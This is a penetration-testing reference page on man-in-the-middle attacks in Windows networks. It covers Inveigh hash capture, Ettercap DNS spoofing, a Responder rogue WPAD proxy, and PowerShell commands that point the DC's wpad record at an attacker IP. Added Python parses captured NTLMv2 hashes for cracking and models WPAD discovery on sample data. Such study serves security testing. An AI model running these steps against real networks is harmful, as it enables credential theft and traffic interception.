Man-in-the-middle attack
A Man-in-the-middle (MITM) attack is one where the attacker sits between clients and their target server.
- The client is fooled into believing the attacker is the server (and, in a full MITM, the server believes the attacker is the client)
- The attacker can read, and possibly modify or drop, every message passing through
On a Windows network the attacker will most likely capture NTLM challenge/response hashes or credentials sent in the clear, which can then be cracked offline (or relayed) to compromise more accounts.
See also: LLMNR/NBT-NS Poisoning.
Common tools
Inveigh
Inveigh (2.5k GitHub stars) is a MITM tool for Windows: it spoofs LLMNR/NBT-NS/mDNS and captures the NTLMv1/NTLMv2 responses of clients that connect to it.
The PS1 script is deprecated (kept here for legacy hosts where running an executable is not an option):
PS> Import-Module .\Inveigh.ps1
PS> Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Use the .NET executable if you have admin privileges (needed to bind the listening ports):
$ wget https://github.com/Kevin-Robertson/Inveigh/releases/download/v2.0.10/Inveigh-net7.0-win-x64-trimmed-single-v2.0.10.zip -O Inveigh.zip
$ unzip Inveigh.zip
PS> .\Inveigh.exe
...
Press ESC to enter the interactive console; HELP lists the commands. The most useful ones dump the captured hashes (one per user, already in hashcat -m 5600 format) and the user list:
PROMPT> HELP
PROMPT> GET NTLMV2UNIQUE
PROMPT> GET NTLMV2USERNAMES
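The captured lines are hashcat mode 5600 (USER::DOMAIN:challenge:NTProofStr:blob). The following added example (not part of Inveigh, nor of the original page) reimplements what GET NTLMV2UNIQUE and GET NTLMV2USERNAMES do over a saved capture file, and additionally pulls the FILETIME out of the NTLMv2 blob so you can tell when each response was generated. The capture lines, the CORP domain, and the user names are constructed sample data; the blob is built by a small helper so the timestamp is known.

```python
import re
import struct
from datetime import datetime, timedelta, timezone

# Inveigh and Responder write NTLMv2 captures in hashcat mode 5600 form:
#   USER::DOMAIN:SERVER_CHALLENGE_HEX(16):NTPROOFSTR_HEX(32):BLOB_HEX
NTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-f]{16}):"
    r"(?P<ntproof>[0-9a-f]{32}):(?P<blob>(?:[0-9a-f]{2})+)$",
    re.IGNORECASE,
)

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_ntlmv2(line):
    """Split one hashcat-5600 line into its fields, or return None if malformed."""
    m = NTLMV2_RE.match(line.strip())
    return m.groupdict() if m else None


def blob_timestamp(blob_hex):
    """Return the FILETIME embedded in an NTLMv2 blob as an aware UTC datetime.

    Blob layout (MS-NLMP NTLMv2_CLIENT_CHALLENGE): RespType(1) HiRespType(1)
    Reserved1(2) Reserved2(4) TimeStamp(8, little-endian FILETIME)
    ChallengeFromClient(8) Reserved3(4) AvPairs(...) Reserved4(4).
    """
    raw = bytes.fromhex(blob_hex)
    if len(raw) < 24 or raw[0] != 0x01 or raw[1] != 0x01:
        raise ValueError("not an NTLMv2 client challenge blob")
    (filetime,) = struct.unpack_from("<Q", raw, 8)
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def unique_ntlmv2(lines):
    """Keep the first capture per (domain, user), like Inveigh's GET NTLMV2UNIQUE."""
    seen = {}
    for line in lines:
        rec = parse_ntlmv2(line)
        if rec is None:
            continue  # console noise, blank lines, NTLMv1 lines
        key = (rec["domain"].upper(), rec["user"].lower())
        seen.setdefault(key, line.strip())
    return list(seen.values())


def ntlmv2_usernames(lines):
    """Sorted DOMAIN\\user list, like Inveigh's GET NTLMV2USERNAMES."""
    recs = (parse_ntlmv2(line) for line in lines)
    return sorted({f"{r['domain'].upper()}\\{r['user']}" for r in recs if r})


def make_blob(ts, client_challenge=b"\x11\x22\x33\x44\x55\x66\x77\x88"):
    """Build a minimal NTLMv2 blob; used only to construct the sample below."""
    delta = ts - FILETIME_EPOCH
    filetime = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return (
        b"\x01\x01\x00\x00\x00\x00\x00\x00"
        + struct.pack("<Q", filetime)
        + client_challenge
        + b"\x00\x00\x00\x00"
        # one AvPair: MsvAvNbDomainName (0x0002), length 8, "CORP" in UTF-16LE, then MsvAvEOL
        + b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le") + b"\x00\x00\x00\x00"
        + b"\x00\x00\x00\x00"
    ).hex()


# Constructed sample capture (hypothetical users and domain); the second alice line is a
# repeat capture that GET NTLMV2UNIQUE would drop.
SAMPLE_TS = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_CAPTURE = [
    "alice::CORP:a1b2c3d4e5f60718:" + "0f" * 16 + ":" + make_blob(SAMPLE_TS),
    "bob::CORP:1122334455667788:" + "ab" * 16 + ":" + make_blob(SAMPLE_TS),
    "alice::corp:99aabbccddeeff00:" + "cd" * 16 + ":" + make_blob(SAMPLE_TS),
    "[+] console noise that is not a hash",
]

if __name__ == "__main__":
    for line in unique_ntlmv2(SAMPLE_CAPTURE):
        rec = parse_ntlmv2(line)
        print(rec["domain"], rec["user"], blob_timestamp(rec["blob"]).isoformat())
    print(ntlmv2_usernames(SAMPLE_CAPTURE))
```

Feed the output of unique_ntlmv2 straight to hashcat -m 5600; the timestamp is handy when correlating a capture with the poisoning event in your own logs.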
Ettercap
Ettercap (2.3k GitHub stars) is a MITM tool (ARP poisoning, DNS spoofing, sniffing) for Linux. To redirect a domain, add the names to spoof and the IP to answer with in etter.dns:
$ cat /etc/ettercap/etter.dns
example.com A X.X.X.X
*.example.com A X.X.X.X
Then, in the graphical interface:
- Navigate to Hosts > Scan for Hosts
- Edit the host list (mark the gateway and the victim as targets)
- Navigate to Plugins > Manage Plugins
- Activate the dns_spoof plugin to start the attack
Only queries for the names listed in etter.dns are answered; everything else is forwarded normally, so the victim does not notice a broken network.
WPAD rogue proxy server
The Web Proxy Auto-Discovery (WPAD) Protocol is used by web browsers to automatically find the web proxy on the network.
Clients first ask DHCP (option 252) for the URL of the proxy auto-config file, then look up a host named wpad in their DNS domain (wpad.corp.example.com, then wpad.example.com, ...), and on Windows finally fall back to LLMNR/NBT-NS for the bare name wpad. The file found there (wpad.dat) tells the browser which proxy to use.
An attacker who answers one of these lookups can serve a rogue wpad.dat and proxy, and thereby intercept the web traffic of every host that was fooled. On Windows, "Automatically detect settings" is on by default and is honoured by Internet Explorer and by browsers that follow the system proxy settings (Edge, Chrome); Firefox only uses WPAD when explicitly set to auto-detect.
We can use Responder (-I interface, -w start the rogue WPAD proxy, -d also inject the WPAD server into DHCP answers, -F force authentication when wpad.dat is fetched, -b ask for Basic instead of NTLM auth so credentials arrive in clear text; note that -b makes the browser show a login prompt, which is noisy):
$ sudo responder -I tun0 -wdF -b
If the compromised account has DNS admin rights (DnsAdmins or Domain Admins), the DNS server on the DC can be made to resolve wpad itself, which catches clients that never fall through to LLMNR. Windows DNS refuses queries for wpad and isatap via its global query block list even when a record exists, so that list must be disabled (or restricted to isatap with the -List parameter) before adding an A record for wpad that points at the attacker:
PS> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.example.com
PS> Add-DnsServerResourceRecordA -Name wpad -ZoneName example.com -ComputerName dc01.example.com -IPv4Address HACKER_IP
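To make the interplay between the discovery order, the global query block list and the two DC commands concrete, here is an added model (example code, not part of Responder, Inveigh or the original page) of the lookups a client performs. It is a simplified assumption about Windows behaviour: DHCP option 252 first, DNS with name devolution down to two labels, then LLMNR/NBT-NS. The domains, the DC name and 10.0.0.99 (standing in for the page's HACKER_IP) are constructed.

```python
from dataclasses import dataclass, field


@dataclass
class DnsServer:
    """Zone data plus the Windows DNS global query block list (GQBL).

    By default a Windows DNS server does not answer for the names 'wpad' and
    'isatap' even when a matching record exists; that is what
    Set-DnsServerGlobalQueryBlockList -Enable $false switches off.
    """
    records: dict = field(default_factory=dict)  # fqdn -> IPv4
    block_list: set = field(default_factory=lambda: {"wpad", "isatap"})
    block_list_enabled: bool = True

    def add_a_record(self, name, zone, ip):
        """Equivalent of Add-DnsServerResourceRecordA -Name name -ZoneName zone."""
        self.records[f"{name}.{zone}".lower()] = ip

    def resolve(self, fqdn):
        fqdn = fqdn.lower().rstrip(".")
        if self.block_list_enabled and fqdn.split(".")[0] in self.block_list:
            return None  # refused by the GQBL, regardless of the record
        return self.records.get(fqdn)


def discover_wpad(client_domain, dns, dhcp_pac_url=None, llmnr_answer=None):
    """Return (channel, pac_url, ip) a client ends up with, or None if nothing answered.

    Simplified model (assumption): DHCP option 252, then DNS devolution
    wpad.<domain> -> wpad.<parent> ... stopping at two labels, then LLMNR/NBT-NS.
    """
    # 1. DHCP option 252 hands the client the PAC URL directly.
    if dhcp_pac_url:
        return ("dhcp", dhcp_pac_url, None)
    # 2. DNS with name devolution: wpad.corp.example.com, then wpad.example.com.
    labels = client_domain.lower().split(".")
    while len(labels) >= 2:
        fqdn = "wpad." + ".".join(labels)
        ip = dns.resolve(fqdn)
        if ip:
            return ("dns", f"http://{fqdn}/wpad.dat", ip)
        labels = labels[1:]
    # 3. Multicast/broadcast fallback for the bare name: this is what Responder
    #    and Inveigh answer (llmnr_answer models the poisoned reply).
    if llmnr_answer:
        return ("llmnr", "http://wpad/wpad.dat", llmnr_answer)
    return None


def demo():
    """Replay the page's attack sequence against a constructed lab domain."""
    dns = DnsServer()
    dns.add_a_record("dc01", "example.com", "10.0.0.10")
    client_domain = "corp.example.com"
    hacker_ip = "10.0.0.99"  # constructed placeholder for HACKER_IP

    # Responder running, DNS untouched: the client falls through to LLMNR.
    before = discover_wpad(client_domain, dns, llmnr_answer=hacker_ip)

    # Add-DnsServerResourceRecordA alone (Responder stopped): the GQBL still
    # refuses the query, so no proxy is discovered at all.
    dns.add_a_record("wpad", "example.com", hacker_ip)
    only_record = discover_wpad(client_domain, dns)

    # Set-DnsServerGlobalQueryBlockList -Enable $false: now DNS devolution hits
    # wpad.example.com and every client in the forest uses the rogue PAC.
    dns.block_list_enabled = False
    after = discover_wpad(client_domain, dns)
    return before, only_record, after


if __name__ == "__main__":
    for label, result in zip(("before", "record only", "record + GQBL off"), demo()):
        print(f"{label:>18}: {result}")
```

The middle step is the one that trips people up in practice: the A record is invisible to clients until the block list is disabled, and conversely a defender who finds the block list disabled should treat it as a finding even if no wpad record is present yet.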